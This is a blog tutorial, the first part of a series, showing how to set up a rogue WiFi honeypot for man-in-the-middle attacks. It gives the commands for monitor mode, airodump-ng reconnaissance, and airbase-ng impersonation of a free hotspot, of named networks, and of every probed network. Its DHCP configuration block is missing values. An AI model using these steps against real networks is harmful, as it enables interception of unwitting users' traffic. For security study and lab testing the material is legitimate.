Man in the Middle 1A: WiFi Honeypots

Man in the middle is a class of attacks where an attacker somehow passes communications through a resource they control. In this series I'm going to describe how an attacker would hijack, control, subvert and snoop on a victims network traffic.

In part 1A here I'm going to explain how attackers can place themselves into a man in the middle (MITM) position using a Wifi honeypot. In part 1B I will will demonstrate how this can be using an ARP Cache poising attack to also initiate a Man in the middle attack. In part 2 I will demonstrate what can be done once in the MITM  position. You can read either 1A OR 1B and go from there. You don't need to read both.
The Plan
What we are trying to do here is get our victim to connect to and use the Internet through the attackers laptop after which we can do a number of things examined in part two. We will get the victim to connect by setting up a fake access point. First by offering free WiFi then impersonating a known router and then automatically impersonating access points.

The setup
For these experiments I am using the following setup. Our Vitim is an EEEPC 900 running Backtrack 5 but it could be an Wifi enabled device. Our attacker is a Macbook running Blackbuntu a Security Linux distro based on Ubuntu. I will also be using an Alfa wireless adapter. I love this USB Wifi adapter, it runs in monitor mode and it can transmit at 1 Watt.

To do this we need to set up a DHCP server to hand out IP addresses. Some people skip this step but I want to make it as convenient as possible to connect to our network. First you may need to install DHCP server with:
apt-get install dhcp3-server
Then open up  /etc/default/dhcp file and add at0 as the default interface.
 You can think of at0 as the Ethernet connection you would find at the back of a Wifi Router.Then open up /etc/dhcp3/dhcpd.conf I use:
nano /etc/dhcp3/dhcpd.conf
and replace the contents with this: 
ddns-update-style none; 
option domain-name-servers,;
default-lease-time 86400;max-lease-time 604800; authoritative; 
subnet netmask {
option subnet-mask;
option broadcast-address; 
option routers;
Creating a honeypot access point
To setup the Wifi router we will use airbase-ng and use airodump-ng to take a look at the Wifi activity around us but first we need to start the Alfa wireless adapter in monitor mode with:

sudo airmon-ng start wlan0

Then to take a look we do:

sudo airodump-ng mon0

This will show you the devices and access points in your area.

CH  9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 00:14:6C:7E:40:80
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:f0:3C:2D:1B:R9   11  16       10        0    0  11  54.  OPN              NETGEAR                         
 00:14:6C:7A:41:81   34 100       57       14    1   9  11e  WEP  WEP         NETGEAR
 00:14:6C:7E:40:80   32 100      752       73    2   9  54   WPA  TKIP   PSK  LINKSYS                            
 BSSID              STATION            PWR   Rate   Lost  Packets  Probes
 00:14:6C:7A:41:81  00:0F:B5:32:31:31   51   36-24    2       14
 (not associated)   00:14:A4:3F:8D:13   19    0-0     0        4    AirportWireless
 00:14:6C:7A:41:81  00:0C:41:52:D1:D1   -1   36-36    0        5    Hilton Wifi
 00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35   54-54    0       99    MyCoWifi

 Now we can can run airbase to create a temping free Wifi hotspot, "FreeWifi" with:

sudo airbase-ng -a aa:bb:cc:dd:ee:ff -e FreeWifi mon0
In this case sudo executes with root (administrator) privileges, -a specifies the BSSID of the access point -e specifies the ESSID (name) of the access point, in this case FreeWifi and finally mon0 is the monitor mode interface of the Alfa wifi card.

From here potential victims can connect to the temping free wireless but we can also target a specific host. Look at the output from airodump-ng, we can see hosts searching for AirportWireless, so we can just slightly change our command to.

sudo airbase-ng -a aa:bb:cc:dd:ee:ff -e AirportWireless mon0

and the victim happily connects.

Quick bit of theory. A wireless access point advertises itself by sending out what are known as beacon frames. These frames are broadcast to anyone who cares to listen advertising the Access point with it's ESSID.
On the other side if a host like your smart phone or your laptop has connected to an Access point before it may request that access point by broadcasting probe request frames asking for it's favorite access points. When an access point respond the device generally tries to connect.

So what says we can't respond to all the requests, claiming to be any access point that is being looked for. What's more we could continue to send out beacons frames after we have received a probe request:
airbase-ng -P -C 30 -v mon0
-P tells airbase-ng to respond to all probe requests. When ever a device request an access point of any BSSID airbase-ng will reply claiming to be the access point. -C 30 tells airbase-ng that once it has received a probe request to start broadcasting beacons claiming to be those access points for 30 seconds. If you look at the available wireless networks using a smartphone for example you should see a myriad of access points appearing, they are all actually your fake airbase-ng  access point.

Wrapping up
In this situation potential victims will only be able to connect but if they are expecting a WEP/WPA/WPA2 connection it will fail to authenticate. I will show in another post how it is possible to get the key from the host. At the moment our victims can connect to our attacker but the victims are not connected to the Internet. We will cover that in part 2.